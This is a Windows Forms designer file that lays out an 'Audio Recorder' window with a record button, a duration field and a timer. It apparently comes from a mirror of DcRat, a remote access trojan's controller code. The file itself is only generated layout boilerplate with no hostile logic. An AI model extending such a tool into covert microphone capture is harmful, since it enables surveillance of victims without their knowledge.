mirror of https://github.com/qwqdanchun/DcRat.git
93 lines
3.5 KiB
C#
93 lines
3.5 KiB
C#
namespace Server.Forms
|
|
{
|
|
partial class FormAudio
|
|
{
|
|
/// <summary>
|
|
/// Required designer variable.
|
|
/// </summary>
|
|
private System.ComponentModel.IContainer components = null;
|
|
|
|
/// <summary>
|
|
/// Clean up any resources being used.
|
|
/// </summary>
|
|
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
|
|
protected override void Dispose(bool disposing)
|
|
{
|
|
if (disposing && (components != null))
|
|
{
|
|
components.Dispose();
|
|
}
|
|
base.Dispose(disposing);
|
|
}
|
|
|
|
#region Windows Form Designer generated code
|
|
|
|
/// <summary>
|
|
/// Required method for Designer support - do not modify
|
|
/// the contents of this method with the code editor.
|
|
/// </summary>
|
|
private void InitializeComponent()
|
|
{
|
|
this.components = new System.ComponentModel.Container();
|
|
this.btnStartStopRecord = new System.Windows.Forms.Button();
|
|
this.timer1 = new System.Windows.Forms.Timer(this.components);
|
|
this.textBox1 = new System.Windows.Forms.TextBox();
|
|
this.label1 = new System.Windows.Forms.Label();
|
|
this.SuspendLayout();
|
|
//
|
|
// btnStartStopRecord
|
|
//
|
|
this.btnStartStopRecord.Location = new System.Drawing.Point(12, 82);
|
|
this.btnStartStopRecord.Name = "btnStartStopRecord";
|
|
this.btnStartStopRecord.Size = new System.Drawing.Size(297, 21);
|
|
this.btnStartStopRecord.TabIndex = 0;
|
|
this.btnStartStopRecord.Text = "Start Recording";
|
|
this.btnStartStopRecord.UseVisualStyleBackColor = true;
|
|
this.btnStartStopRecord.Click += new System.EventHandler(this.btnStartStopRecord_Click);
|
|
//
|
|
// timer1
|
|
//
|
|
this.timer1.Tick += new System.EventHandler(this.timer1_Tick);
|
|
//
|
|
// textBox1
|
|
//
|
|
this.textBox1.Location = new System.Drawing.Point(12, 33);
|
|
this.textBox1.Name = "textBox1";
|
|
this.textBox1.Size = new System.Drawing.Size(244, 21);
|
|
this.textBox1.TabIndex = 2;
|
|
this.textBox1.Text = "10";
|
|
//
|
|
// label1
|
|
//
|
|
this.label1.AutoSize = true;
|
|
this.label1.Location = new System.Drawing.Point(262, 36);
|
|
this.label1.Name = "label1";
|
|
this.label1.Size = new System.Drawing.Size(47, 12);
|
|
this.label1.TabIndex = 3;
|
|
this.label1.Text = "seconds";
|
|
//
|
|
// FormAudio
|
|
//
|
|
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
|
|
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
|
|
this.ClientSize = new System.Drawing.Size(321, 115);
|
|
this.Controls.Add(this.label1);
|
|
this.Controls.Add(this.textBox1);
|
|
this.Controls.Add(this.btnStartStopRecord);
|
|
this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle;
|
|
this.Name = "FormAudio";
|
|
this.ShowIcon = false;
|
|
this.Text = "Audio Recorder";
|
|
this.ResumeLayout(false);
|
|
this.PerformLayout();
|
|
|
|
}
|
|
|
|
#endregion
|
|
|
|
public System.Windows.Forms.Button btnStartStopRecord;
|
|
private System.Windows.Forms.Timer timer1;
|
|
private System.Windows.Forms.TextBox textBox1;
|
|
private System.Windows.Forms.Label label1;
|
|
}
|
|
} |